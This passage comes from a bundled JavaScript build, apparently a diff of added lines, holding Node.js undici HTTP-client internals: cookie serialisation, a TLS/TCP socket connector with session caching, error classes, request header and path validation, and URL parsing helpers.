case-sensitive + / %x4D.61.79 ; "May", case-sensitive + / %x4A.75.6E ; "Jun", case-sensitive + / %x4A.75.6C ; "Jul", case-sensitive + / %x41.75.67 ; "Aug", case-sensitive + / %x53.65.70 ; "Sep", case-sensitive + / %x4F.63.74 ; "Oct", case-sensitive + / %x4E.6F.76 ; "Nov", case-sensitive + / %x44.65.63 ; "Dec", case-sensitive + year = 4DIGIT + + GMT = %x47.4D.54 ; "GMT", case-sensitive + + time-of-day = hour ":" minute ":" second + ; 00:00:00 - 23:59:60 (leap second) + + hour = 2DIGIT + minute = 2DIGIT + second = 2DIGIT + */ +function toIMFDate (date) { + if (typeof date === 'number') { + date = new Date(date) + } + + const days = [ + 'Sun', 'Mon', 'Tue', 'Wed', + 'Thu', 'Fri', 'Sat' + ] + + const months = [ + 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', + 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec' + ] + + const dayName = days[date.getUTCDay()] + const day = date.getUTCDate().toString().padStart(2, '0') + const month = months[date.getUTCMonth()] + const year = date.getUTCFullYear() + const hour = date.getUTCHours().toString().padStart(2, '0') + const minute = date.getUTCMinutes().toString().padStart(2, '0') + const second = date.getUTCSeconds().toString().padStart(2, '0') + + return `${dayName}, ${day} ${month} ${year} ${hour}:${minute}:${second} GMT` +} + +/** + max-age-av = "Max-Age=" non-zero-digit *DIGIT + ; In practice, both expires-av and max-age-av + ; are limited to dates representable by the + ; user agent. + * @param {number} maxAge + */ +function validateCookieMaxAge (maxAge) { + if (maxAge < 0) { + throw new Error('Invalid cookie max-age') + } +} + +/** + * @see https://www.rfc-editor.org/rfc/rfc6265#section-4.1.1 + * @param {import('./index').Cookie} cookie + */ +function stringify (cookie) { + if (cookie.name.length === 0) { + return null + } + + validateCookieName(cookie.name) + validateCookieValue(cookie.value) + + const out = [`${cookie.name}=${cookie.value}`] + + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.1 + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.2 + if (cookie.name.startsWith('__Secure-')) { + cookie.secure = true + } + + if (cookie.name.startsWith('__Host-')) { + cookie.secure = true + cookie.domain = null + cookie.path = '/' + } + + if (cookie.secure) { + out.push('Secure') + } + + if (cookie.httpOnly) { + out.push('HttpOnly') + } + + if (typeof cookie.maxAge === 'number') { + validateCookieMaxAge(cookie.maxAge) + out.push(`Max-Age=${cookie.maxAge}`) + } + + if (cookie.domain) { + validateCookieDomain(cookie.domain) + out.push(`Domain=${cookie.domain}`) + } + + if (cookie.path) { + validateCookiePath(cookie.path) + out.push(`Path=${cookie.path}`) + } + + if (cookie.expires && cookie.expires.toString() !== 'Invalid Date') { + out.push(`Expires=${toIMFDate(cookie.expires)}`) + } + + if (cookie.sameSite) { + out.push(`SameSite=${cookie.sameSite}`) + } + + for (const part of cookie.unparsed) { + if (!part.includes('=')) { + throw new Error('Invalid unparsed') + } + + const [key, ...value] = part.split('=') + + out.push(`${key.trim()}=${value.join('=')}`) + } + + return out.join('; ') +} + +let kHeadersListNode + +function getHeadersList (headers) { + if (headers[kHeadersList]) { + return headers[kHeadersList] + } + + if (!kHeadersListNode) { + kHeadersListNode = Object.getOwnPropertySymbols(headers).find( + (symbol) => symbol.description === 'headers list' + ) + + assert(kHeadersListNode, 'Headers cannot be parsed') + } + + const headersList = headers[kHeadersListNode] + assert(headersList) + + return headersList +} + +module.exports = { + isCTLExcludingHtab, + stringify, + getHeadersList +} + + +/***/ }), + +/***/ 2067: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const net = __nccwpck_require__(1808) +const assert = __nccwpck_require__(9491) +const util = __nccwpck_require__(3983) +const { InvalidArgumentError, ConnectTimeoutError } = __nccwpck_require__(8045) + +let tls // include tls conditionally since it is not always available + +// TODO: session re-use does not wait for the first +// connection to resolve the session and might therefore +// resolve the same servername multiple times even when +// re-use is enabled. + +let SessionCache +// FIXME: remove workaround when the Node bug is fixed +// https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 +if (global.FinalizationRegistry && !process.env.NODE_V8_COVERAGE) { + SessionCache = class WeakSessionCache { + constructor (maxCachedSessions) { + this._maxCachedSessions = maxCachedSessions + this._sessionCache = new Map() + this._sessionRegistry = new global.FinalizationRegistry((key) => { + if (this._sessionCache.size < this._maxCachedSessions) { + return + } + + const ref = this._sessionCache.get(key) + if (ref !== undefined && ref.deref() === undefined) { + this._sessionCache.delete(key) + } + }) + } + + get (sessionKey) { + const ref = this._sessionCache.get(sessionKey) + return ref ? ref.deref() : null + } + + set (sessionKey, session) { + if (this._maxCachedSessions === 0) { + return + } + + this._sessionCache.set(sessionKey, new WeakRef(session)) + this._sessionRegistry.register(session, sessionKey) + } + } +} else { + SessionCache = class SimpleSessionCache { + constructor (maxCachedSessions) { + this._maxCachedSessions = maxCachedSessions + this._sessionCache = new Map() + } + + get (sessionKey) { + return this._sessionCache.get(sessionKey) + } + + set (sessionKey, session) { + if (this._maxCachedSessions === 0) { + return + } + + if (this._sessionCache.size >= this._maxCachedSessions) { + // remove the oldest session + const { value: oldestKey } = this._sessionCache.keys().next() + this._sessionCache.delete(oldestKey) + } + + this._sessionCache.set(sessionKey, session) + } + } +} + +function buildConnector ({ allowH2, maxCachedSessions, socketPath, timeout, ...opts }) { + if (maxCachedSessions != null && (!Number.isInteger(maxCachedSessions) || maxCachedSessions < 0)) { + throw new InvalidArgumentError('maxCachedSessions must be a positive integer or zero') + } + + const options = { path: socketPath, ...opts } + const sessionCache = new SessionCache(maxCachedSessions == null ? 100 : maxCachedSessions) + timeout = timeout == null ? 10e3 : timeout + allowH2 = allowH2 != null ? allowH2 : false + return function connect ({ hostname, host, protocol, port, servername, localAddress, httpSocket }, callback) { + let socket + if (protocol === 'https:') { + if (!tls) { + tls = __nccwpck_require__(4404) + } + servername = servername || options.servername || util.getServerName(host) || null + + const sessionKey = servername || hostname + const session = sessionCache.get(sessionKey) || null + + assert(sessionKey) + + socket = tls.connect({ + highWaterMark: 16384, // TLS in node can't have bigger HWM anyway... + ...options, + servername, + session, + localAddress, + // TODO(HTTP/2): Add support for h2c + ALPNProtocols: allowH2 ? ['http/1.1', 'h2'] : ['http/1.1'], + socket: httpSocket, // upgrade socket connection + port: port || 443, + host: hostname + }) + + socket + .on('session', function (session) { + // TODO (fix): Can a session become invalid once established? Don't think so? + sessionCache.set(sessionKey, session) + }) + } else { + assert(!httpSocket, 'httpSocket can only be sent on TLS update') + socket = net.connect({ + highWaterMark: 64 * 1024, // Same as nodejs fs streams. + ...options, + localAddress, + port: port || 80, + host: hostname + }) + } + + // Set TCP keep alive options on the socket here instead of in connect() for the case of assigning the socket + if (options.keepAlive == null || options.keepAlive) { + const keepAliveInitialDelay = options.keepAliveInitialDelay === undefined ? 60e3 : options.keepAliveInitialDelay + socket.setKeepAlive(true, keepAliveInitialDelay) + } + + const cancelTimeout = setupTimeout(() => onConnectTimeout(socket), timeout) + + socket + .setNoDelay(true) + .once(protocol === 'https:' ? 'secureConnect' : 'connect', function () { + cancelTimeout() + + if (callback) { + const cb = callback + callback = null + cb(null, this) + } + }) + .on('error', function (err) { + cancelTimeout() + + if (callback) { + const cb = callback + callback = null + cb(err) + } + }) + + return socket + } +} + +function setupTimeout (onConnectTimeout, timeout) { + if (!timeout) { + return () => {} + } + + let s1 = null + let s2 = null + const timeoutId = setTimeout(() => { + // setImmediate is added to make sure that we priotorise socket error events over timeouts + s1 = setImmediate(() => { + if (process.platform === 'win32') { + // Windows needs an extra setImmediate probably due to implementation differences in the socket logic + s2 = setImmediate(() => onConnectTimeout()) + } else { + onConnectTimeout() + } + }) + }, timeout) + return () => { + clearTimeout(timeoutId) + clearImmediate(s1) + clearImmediate(s2) + } +} + +function onConnectTimeout (socket) { + util.destroy(socket, new ConnectTimeoutError()) +} + +module.exports = buildConnector + + +/***/ }), + +/***/ 8045: +/***/ ((module) => { + +"use strict"; + + +class UndiciError extends Error { + constructor (message) { + super(message) + this.name = 'UndiciError' + this.code = 'UND_ERR' + } +} + +class ConnectTimeoutError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ConnectTimeoutError) + this.name = 'ConnectTimeoutError' + this.message = message || 'Connect Timeout Error' + this.code = 'UND_ERR_CONNECT_TIMEOUT' + } +} + +class HeadersTimeoutError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, HeadersTimeoutError) + this.name = 'HeadersTimeoutError' + this.message = message || 'Headers Timeout Error' + this.code = 'UND_ERR_HEADERS_TIMEOUT' + } +} + +class HeadersOverflowError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, HeadersOverflowError) + this.name = 'HeadersOverflowError' + this.message = message || 'Headers Overflow Error' + this.code = 'UND_ERR_HEADERS_OVERFLOW' + } +} + +class BodyTimeoutError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, BodyTimeoutError) + this.name = 'BodyTimeoutError' + this.message = message || 'Body Timeout Error' + this.code = 'UND_ERR_BODY_TIMEOUT' + } +} + +class ResponseStatusCodeError extends UndiciError { + constructor (message, statusCode, headers, body) { + super(message) + Error.captureStackTrace(this, ResponseStatusCodeError) + this.name = 'ResponseStatusCodeError' + this.message = message || 'Response Status Code Error' + this.code = 'UND_ERR_RESPONSE_STATUS_CODE' + this.body = body + this.status = statusCode + this.statusCode = statusCode + this.headers = headers + } +} + +class InvalidArgumentError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, InvalidArgumentError) + this.name = 'InvalidArgumentError' + this.message = message || 'Invalid Argument Error' + this.code = 'UND_ERR_INVALID_ARG' + } +} + +class InvalidReturnValueError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, InvalidReturnValueError) + this.name = 'InvalidReturnValueError' + this.message = message || 'Invalid Return Value Error' + this.code = 'UND_ERR_INVALID_RETURN_VALUE' + } +} + +class RequestAbortedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, RequestAbortedError) + this.name = 'AbortError' + this.message = message || 'Request aborted' + this.code = 'UND_ERR_ABORTED' + } +} + +class InformationalError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, InformationalError) + this.name = 'InformationalError' + this.message = message || 'Request information' + this.code = 'UND_ERR_INFO' + } +} + +class RequestContentLengthMismatchError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, RequestContentLengthMismatchError) + this.name = 'RequestContentLengthMismatchError' + this.message = message || 'Request body length does not match content-length header' + this.code = 'UND_ERR_REQ_CONTENT_LENGTH_MISMATCH' + } +} + +class ResponseContentLengthMismatchError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ResponseContentLengthMismatchError) + this.name = 'ResponseContentLengthMismatchError' + this.message = message || 'Response body length does not match content-length header' + this.code = 'UND_ERR_RES_CONTENT_LENGTH_MISMATCH' + } +} + +class ClientDestroyedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ClientDestroyedError) + this.name = 'ClientDestroyedError' + this.message = message || 'The client is destroyed' + this.code = 'UND_ERR_DESTROYED' + } +} + +class ClientClosedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ClientClosedError) + this.name = 'ClientClosedError' + this.message = message || 'The client is closed' + this.code = 'UND_ERR_CLOSED' + } +} + +class SocketError extends UndiciError { + constructor (message, socket) { + super(message) + Error.captureStackTrace(this, SocketError) + this.name = 'SocketError' + this.message = message || 'Socket error' + this.code = 'UND_ERR_SOCKET' + this.socket = socket + } +} + +class NotSupportedError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, NotSupportedError) + this.name = 'NotSupportedError' + this.message = message || 'Not supported error' + this.code = 'UND_ERR_NOT_SUPPORTED' + } +} + +class BalancedPoolMissingUpstreamError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, NotSupportedError) + this.name = 'MissingUpstreamError' + this.message = message || 'No upstream has been added to the BalancedPool' + this.code = 'UND_ERR_BPL_MISSING_UPSTREAM' + } +} + +class HTTPParserError extends Error { + constructor (message, code, data) { + super(message) + Error.captureStackTrace(this, HTTPParserError) + this.name = 'HTTPParserError' + this.code = code ? `HPE_${code}` : undefined + this.data = data ? data.toString() : undefined + } +} + +class ResponseExceededMaxSizeError extends UndiciError { + constructor (message) { + super(message) + Error.captureStackTrace(this, ResponseExceededMaxSizeError) + this.name = 'ResponseExceededMaxSizeError' + this.message = message || 'Response content exceeded max size' + this.code = 'UND_ERR_RES_EXCEEDED_MAX_SIZE' + } +} + +class RequestRetryError extends UndiciError { + constructor (message, code, { headers, data }) { + super(message) + Error.captureStackTrace(this, RequestRetryError) + this.name = 'RequestRetryError' + this.message = message || 'Request retry error' + this.code = 'UND_ERR_REQ_RETRY' + this.statusCode = code + this.data = data + this.headers = headers + } +} + +module.exports = { + HTTPParserError, + UndiciError, + HeadersTimeoutError, + HeadersOverflowError, + BodyTimeoutError, + RequestContentLengthMismatchError, + ConnectTimeoutError, + ResponseStatusCodeError, + InvalidArgumentError, + InvalidReturnValueError, + RequestAbortedError, + ClientDestroyedError, + ClientClosedError, + InformationalError, + SocketError, + NotSupportedError, + ResponseContentLengthMismatchError, + BalancedPoolMissingUpstreamError, + ResponseExceededMaxSizeError, + RequestRetryError +} + + +/***/ }), + +/***/ 2905: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { + InvalidArgumentError, + NotSupportedError +} = __nccwpck_require__(8045) +const assert = __nccwpck_require__(9491) +const { kHTTP2BuildRequest, kHTTP2CopyHeaders, kHTTP1BuildRequest } = __nccwpck_require__(2785) +const util = __nccwpck_require__(3983) + +// tokenRegExp and headerCharRegex have been lifted from +// https://github.com/nodejs/node/blob/main/lib/_http_common.js + +/** + * Verifies that the given val is a valid HTTP token + * per the rules defined in RFC 7230 + * See https://tools.ietf.org/html/rfc7230#section-3.2.6 + */ +const tokenRegExp = /^[\^_`a-zA-Z\-0-9!#$%&'*+.|~]+$/ + +/** + * Matches if val contains an invalid field-vchar + * field-value = *( field-content / obs-fold ) + * field-content = field-vchar [ 1*( SP / HTAB ) field-vchar ] + * field-vchar = VCHAR / obs-text + */ +const headerCharRegex = /[^\t\x20-\x7e\x80-\xff]/ + +// Verifies that a given path is valid does not contain control chars \x00 to \x20 +const invalidPathRegex = /[^\u0021-\u00ff]/ + +const kHandler = Symbol('handler') + +const channels = {} + +let extractBody + +try { + const diagnosticsChannel = __nccwpck_require__(7643) + channels.create = diagnosticsChannel.channel('undici:request:create') + channels.bodySent = diagnosticsChannel.channel('undici:request:bodySent') + channels.headers = diagnosticsChannel.channel('undici:request:headers') + channels.trailers = diagnosticsChannel.channel('undici:request:trailers') + channels.error = diagnosticsChannel.channel('undici:request:error') +} catch { + channels.create = { hasSubscribers: false } + channels.bodySent = { hasSubscribers: false } + channels.headers = { hasSubscribers: false } + channels.trailers = { hasSubscribers: false } + channels.error = { hasSubscribers: false } +} + +class Request { + constructor (origin, { + path, + method, + body, + headers, + query, + idempotent, + blocking, + upgrade, + headersTimeout, + bodyTimeout, + reset, + throwOnError, + expectContinue + }, handler) { + if (typeof path !== 'string') { + throw new InvalidArgumentError('path must be a string') + } else if ( + path[0] !== '/' && + !(path.startsWith('http://') || path.startsWith('https://')) && + method !== 'CONNECT' + ) { + throw new InvalidArgumentError('path must be an absolute URL or start with a slash') + } else if (invalidPathRegex.exec(path) !== null) { + throw new InvalidArgumentError('invalid request path') + } + + if (typeof method !== 'string') { + throw new InvalidArgumentError('method must be a string') + } else if (tokenRegExp.exec(method) === null) { + throw new InvalidArgumentError('invalid request method') + } + + if (upgrade && typeof upgrade !== 'string') { + throw new InvalidArgumentError('upgrade must be a string') + } + + if (headersTimeout != null && (!Number.isFinite(headersTimeout) || headersTimeout < 0)) { + throw new InvalidArgumentError('invalid headersTimeout') + } + + if (bodyTimeout != null && (!Number.isFinite(bodyTimeout) || bodyTimeout < 0)) { + throw new InvalidArgumentError('invalid bodyTimeout') + } + + if (reset != null && typeof reset !== 'boolean') { + throw new InvalidArgumentError('invalid reset') + } + + if (expectContinue != null && typeof expectContinue !== 'boolean') { + throw new InvalidArgumentError('invalid expectContinue') + } + + this.headersTimeout = headersTimeout + + this.bodyTimeout = bodyTimeout + + this.throwOnError = throwOnError === true + + this.method = method + + this.abort = null + + if (body == null) { + this.body = null + } else if (util.isStream(body)) { + this.body = body + + const rState = this.body._readableState + if (!rState || !rState.autoDestroy) { + this.endHandler = function autoDestroy () { + util.destroy(this) + } + this.body.on('end', this.endHandler) + } + + this.errorHandler = err => { + if (this.abort) { + this.abort(err) + } else { + this.error = err + } + } + this.body.on('error', this.errorHandler) + } else if (util.isBuffer(body)) { + this.body = body.byteLength ? body : null + } else if (ArrayBuffer.isView(body)) { + this.body = body.buffer.byteLength ? Buffer.from(body.buffer, body.byteOffset, body.byteLength) : null + } else if (body instanceof ArrayBuffer) { + this.body = body.byteLength ? Buffer.from(body) : null + } else if (typeof body === 'string') { + this.body = body.length ? Buffer.from(body) : null + } else if (util.isFormDataLike(body) || util.isIterable(body) || util.isBlobLike(body)) { + this.body = body + } else { + throw new InvalidArgumentError('body must be a string, a Buffer, a Readable stream, an iterable, or an async iterable') + } + + this.completed = false + + this.aborted = false + + this.upgrade = upgrade || null + + this.path = query ? util.buildURL(path, query) : path + + this.origin = origin + + this.idempotent = idempotent == null + ? method === 'HEAD' || method === 'GET' + : idempotent + + this.blocking = blocking == null ? false : blocking + + this.reset = reset == null ? null : reset + + this.host = null + + this.contentLength = null + + this.contentType = null + + this.headers = '' + + // Only for H2 + this.expectContinue = expectContinue != null ? expectContinue : false + + if (Array.isArray(headers)) { + if (headers.length % 2 !== 0) { + throw new InvalidArgumentError('headers array must be even') + } + for (let i = 0; i < headers.length; i += 2) { + processHeader(this, headers[i], headers[i + 1]) + } + } else if (headers && typeof headers === 'object') { + const keys = Object.keys(headers) + for (let i = 0; i < keys.length; i++) { + const key = keys[i] + processHeader(this, key, headers[key]) + } + } else if (headers != null) { + throw new InvalidArgumentError('headers must be an object or an array') + } + + if (util.isFormDataLike(this.body)) { + if (util.nodeMajor < 16 || (util.nodeMajor === 16 && util.nodeMinor < 8)) { + throw new InvalidArgumentError('Form-Data bodies are only supported in node v16.8 and newer.') + } + + if (!extractBody) { + extractBody = (__nccwpck_require__(1472).extractBody) + } + + const [bodyStream, contentType] = extractBody(body) + if (this.contentType == null) { + this.contentType = contentType + this.headers += `content-type: ${contentType}\r\n` + } + this.body = bodyStream.stream + this.contentLength = bodyStream.length + } else if (util.isBlobLike(body) && this.contentType == null && body.type) { + this.contentType = body.type + this.headers += `content-type: ${body.type}\r\n` + } + + util.validateHandler(handler, method, upgrade) + + this.servername = util.getServerName(this.host) + + this[kHandler] = handler + + if (channels.create.hasSubscribers) { + channels.create.publish({ request: this }) + } + } + + onBodySent (chunk) { + if (this[kHandler].onBodySent) { + try { + return this[kHandler].onBodySent(chunk) + } catch (err) { + this.abort(err) + } + } + } + + onRequestSent () { + if (channels.bodySent.hasSubscribers) { + channels.bodySent.publish({ request: this }) + } + + if (this[kHandler].onRequestSent) { + try { + return this[kHandler].onRequestSent() + } catch (err) { + this.abort(err) + } + } + } + + onConnect (abort) { + assert(!this.aborted) + assert(!this.completed) + + if (this.error) { + abort(this.error) + } else { + this.abort = abort + return this[kHandler].onConnect(abort) + } + } + + onHeaders (statusCode, headers, resume, statusText) { + assert(!this.aborted) + assert(!this.completed) + + if (channels.headers.hasSubscribers) { + channels.headers.publish({ request: this, response: { statusCode, headers, statusText } }) + } + + try { + return this[kHandler].onHeaders(statusCode, headers, resume, statusText) + } catch (err) { + this.abort(err) + } + } + + onData (chunk) { + assert(!this.aborted) + assert(!this.completed) + + try { + return this[kHandler].onData(chunk) + } catch (err) { + this.abort(err) + return false + } + } + + onUpgrade (statusCode, headers, socket) { + assert(!this.aborted) + assert(!this.completed) + + return this[kHandler].onUpgrade(statusCode, headers, socket) + } + + onComplete (trailers) { + this.onFinally() + + assert(!this.aborted) + + this.completed = true + if (channels.trailers.hasSubscribers) { + channels.trailers.publish({ request: this, trailers }) + } + + try { + return this[kHandler].onComplete(trailers) + } catch (err) { + // TODO (fix): This might be a bad idea? + this.onError(err) + } + } + + onError (error) { + this.onFinally() + + if (channels.error.hasSubscribers) { + channels.error.publish({ request: this, error }) + } + + if (this.aborted) { + return + } + this.aborted = true + + return this[kHandler].onError(error) + } + + onFinally () { + if (this.errorHandler) { + this.body.off('error', this.errorHandler) + this.errorHandler = null + } + + if (this.endHandler) { + this.body.off('end', this.endHandler) + this.endHandler = null + } + } + + // TODO: adjust to support H2 + addHeader (key, value) { + processHeader(this, key, value) + return this + } + + static [kHTTP1BuildRequest] (origin, opts, handler) { + // TODO: Migrate header parsing here, to make Requests + // HTTP agnostic + return new Request(origin, opts, handler) + } + + static [kHTTP2BuildRequest] (origin, opts, handler) { + const headers = opts.headers + opts = { ...opts, headers: null } + + const request = new Request(origin, opts, handler) + + request.headers = {} + + if (Array.isArray(headers)) { + if (headers.length % 2 !== 0) { + throw new InvalidArgumentError('headers array must be even') + } + for (let i = 0; i < headers.length; i += 2) { + processHeader(request, headers[i], headers[i + 1], true) + } + } else if (headers && typeof headers === 'object') { + const keys = Object.keys(headers) + for (let i = 0; i < keys.length; i++) { + const key = keys[i] + processHeader(request, key, headers[key], true) + } + } else if (headers != null) { + throw new InvalidArgumentError('headers must be an object or an array') + } + + return request + } + + static [kHTTP2CopyHeaders] (raw) { + const rawHeaders = raw.split('\r\n') + const headers = {} + + for (const header of rawHeaders) { + const [key, value] = header.split(': ') + + if (value == null || value.length === 0) continue + + if (headers[key]) headers[key] += `,${value}` + else headers[key] = value + } + + return headers + } +} + +function processHeaderValue (key, val, skipAppend) { + if (val && typeof val === 'object') { + throw new InvalidArgumentError(`invalid ${key} header`) + } + + val = val != null ? `${val}` : '' + + if (headerCharRegex.exec(val) !== null) { + throw new InvalidArgumentError(`invalid ${key} header`) + } + + return skipAppend ? val : `${key}: ${val}\r\n` +} + +function processHeader (request, key, val, skipAppend = false) { + if (val && (typeof val === 'object' && !Array.isArray(val))) { + throw new InvalidArgumentError(`invalid ${key} header`) + } else if (val === undefined) { + return + } + + if ( + request.host === null && + key.length === 4 && + key.toLowerCase() === 'host' + ) { + if (headerCharRegex.exec(val) !== null) { + throw new InvalidArgumentError(`invalid ${key} header`) + } + // Consumed by Client + request.host = val + } else if ( + request.contentLength === null && + key.length === 14 && + key.toLowerCase() === 'content-length' + ) { + request.contentLength = parseInt(val, 10) + if (!Number.isFinite(request.contentLength)) { + throw new InvalidArgumentError('invalid content-length header') + } + } else if ( + request.contentType === null && + key.length === 12 && + key.toLowerCase() === 'content-type' + ) { + request.contentType = val + if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) + else request.headers += processHeaderValue(key, val) + } else if ( + key.length === 17 && + key.toLowerCase() === 'transfer-encoding' + ) { + throw new InvalidArgumentError('invalid transfer-encoding header') + } else if ( + key.length === 10 && + key.toLowerCase() === 'connection' + ) { + const value = typeof val === 'string' ? val.toLowerCase() : null + if (value !== 'close' && value !== 'keep-alive') { + throw new InvalidArgumentError('invalid connection header') + } else if (value === 'close') { + request.reset = true + } + } else if ( + key.length === 10 && + key.toLowerCase() === 'keep-alive' + ) { + throw new InvalidArgumentError('invalid keep-alive header') + } else if ( + key.length === 7 && + key.toLowerCase() === 'upgrade' + ) { + throw new InvalidArgumentError('invalid upgrade header') + } else if ( + key.length === 6 && + key.toLowerCase() === 'expect' + ) { + throw new NotSupportedError('expect header not supported') + } else if (tokenRegExp.exec(key) === null) { + throw new InvalidArgumentError('invalid header key') + } else { + if (Array.isArray(val)) { + for (let i = 0; i < val.length; i++) { + if (skipAppend) { + if (request.headers[key]) request.headers[key] += `,${processHeaderValue(key, val[i], skipAppend)}` + else request.headers[key] = processHeaderValue(key, val[i], skipAppend) + } else { + request.headers += processHeaderValue(key, val[i]) + } + } + } else { + if (skipAppend) request.headers[key] = processHeaderValue(key, val, skipAppend) + else request.headers += processHeaderValue(key, val) + } + } +} + +module.exports = Request + + +/***/ }), + +/***/ 2785: +/***/ ((module) => { + +module.exports = { + kClose: Symbol('close'), + kDestroy: Symbol('destroy'), + kDispatch: Symbol('dispatch'), + kUrl: Symbol('url'), + kWriting: Symbol('writing'), + kResuming: Symbol('resuming'), + kQueue: Symbol('queue'), + kConnect: Symbol('connect'), + kConnecting: Symbol('connecting'), + kHeadersList: Symbol('headers list'), + kKeepAliveDefaultTimeout: Symbol('default keep alive timeout'), + kKeepAliveMaxTimeout: Symbol('max keep alive timeout'), + kKeepAliveTimeoutThreshold: Symbol('keep alive timeout threshold'), + kKeepAliveTimeoutValue: Symbol('keep alive timeout'), + kKeepAlive: Symbol('keep alive'), + kHeadersTimeout: Symbol('headers timeout'), + kBodyTimeout: Symbol('body timeout'), + kServerName: Symbol('server name'), + kLocalAddress: Symbol('local address'), + kHost: Symbol('host'), + kNoRef: Symbol('no ref'), + kBodyUsed: Symbol('used'), + kRunning: Symbol('running'), + kBlocking: Symbol('blocking'), + kPending: Symbol('pending'), + kSize: Symbol('size'), + kBusy: Symbol('busy'), + kQueued: Symbol('queued'), + kFree: Symbol('free'), + kConnected: Symbol('connected'), + kClosed: Symbol('closed'), + kNeedDrain: Symbol('need drain'), + kReset: Symbol('reset'), + kDestroyed: Symbol.for('nodejs.stream.destroyed'), + kMaxHeadersSize: Symbol('max headers size'), + kRunningIdx: Symbol('running index'), + kPendingIdx: Symbol('pending index'), + kError: Symbol('error'), + kClients: Symbol('clients'), + kClient: Symbol('client'), + kParser: Symbol('parser'), + kOnDestroyed: Symbol('destroy callbacks'), + kPipelining: Symbol('pipelining'), + kSocket: Symbol('socket'), + kHostHeader: Symbol('host header'), + kConnector: Symbol('connector'), + kStrictContentLength: Symbol('strict content length'), + kMaxRedirections: Symbol('maxRedirections'), + kMaxRequests: Symbol('maxRequestsPerClient'), + kProxy: Symbol('proxy agent options'), + kCounter: Symbol('socket request counter'), + kInterceptors: Symbol('dispatch interceptors'), + kMaxResponseSize: Symbol('max response size'), + kHTTP2Session: Symbol('http2Session'), + kHTTP2SessionState: Symbol('http2Session state'), + kHTTP2BuildRequest: Symbol('http2 build request'), + kHTTP1BuildRequest: Symbol('http1 build request'), + kHTTP2CopyHeaders: Symbol('http2 copy headers'), + kHTTPConnVersion: Symbol('http connection version'), + kRetryHandlerDefaultRetry: Symbol('retry agent default retry'), + kConstruct: Symbol('constructable') +} + + +/***/ }), + +/***/ 3983: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const assert = __nccwpck_require__(9491) +const { kDestroyed, kBodyUsed } = __nccwpck_require__(2785) +const { IncomingMessage } = __nccwpck_require__(3685) +const stream = __nccwpck_require__(2781) +const net = __nccwpck_require__(1808) +const { InvalidArgumentError } = __nccwpck_require__(8045) +const { Blob } = __nccwpck_require__(4300) +const nodeUtil = __nccwpck_require__(3837) +const { stringify } = __nccwpck_require__(3477) + +const [nodeMajor, nodeMinor] = process.versions.node.split('.').map(v => Number(v)) + +function nop () {} + +function isStream (obj) { + return obj && typeof obj === 'object' && typeof obj.pipe === 'function' && typeof obj.on === 'function' +} + +// based on https://github.com/node-fetch/fetch-blob/blob/8ab587d34080de94140b54f07168451e7d0b655e/index.js#L229-L241 (MIT License) +function isBlobLike (object) { + return (Blob && object instanceof Blob) || ( + object && + typeof object === 'object' && + (typeof object.stream === 'function' || + typeof object.arrayBuffer === 'function') && + /^(Blob|File)$/.test(object[Symbol.toStringTag]) + ) +} + +function buildURL (url, queryParams) { + if (url.includes('?') || url.includes('#')) { + throw new Error('Query params cannot be passed when url already contains "?" or "#".') + } + + const stringified = stringify(queryParams) + + if (stringified) { + url += '?' + stringified + } + + return url +} + +function parseURL (url) { + if (typeof url === 'string') { + url = new URL(url) + + if (!/^https?:/.test(url.origin || url.protocol)) { + throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') + } + + return url + } + + if (!url || typeof url !== 'object') { + throw new InvalidArgumentError('Invalid URL: The URL argument must be a non-null object.') + } + + if (!/^https?:/.test(url.origin || url.protocol)) { + throw new InvalidArgumentError('Invalid URL protocol: the URL must start with `http:` or `https:`.') + } + + if (!(url instanceof URL)) { + if (url.port != null && url.port !== '' && !Number.isFinite(parseInt(url.port))) { + throw new InvalidArgumentError('Invalid URL: port must be a valid integer or a string representation of an integer.') + } + + if (url.path != null && typeof url.path !== 'string') { + throw new InvalidArgumentError('Invalid URL path: the path must be a string or null/undefined.') + } + + if (url.pathname != null && typeof url.pathname !== 'string') { + throw new InvalidArgumentError('Invalid URL pathname: the pathname must be a string or null/undefined.') + } + + if (url.hostname != null && typeof url.hostname !== 'string') { + throw new InvalidArgumentError('Invalid URL hostname: the hostname must be a string or null/undefined.') + } + + if (url.origin != null && typeof url.origin !== 'string') { + throw new InvalidArgumentError('Invalid URL origin: the origin must be a string or null/undefined.') + } + + const port = url.port != null + ? url.port + : (url.protocol === 'https:' ? 443 : 80) + let origin = url.origin != null + ? url.origin + : `${url.protocol}//${url.hostname}:${port}` + let path = url.path != null + ? url.path + : `${url.pathname || ''}${url.search || ''}` + + if (origin.endsWith('/')) { + origin = origin.substring(0, origin.length - 1) + } + + if (path && !path.startsWith('/')) { + path = `/${path}` + } + // new URL(path, origin) is unsafe when `path` contains an absolute URL + // From https://developer.mozilla.org/en-US/docs/Web/API/URL/URL: + // If first parameter is a relative URL, second param is required, and will be used as the base URL. + // If first parameter is an absolute URL, a given second param will be ignored. + url = new URL(origin + path) + } + + return url +} + +function 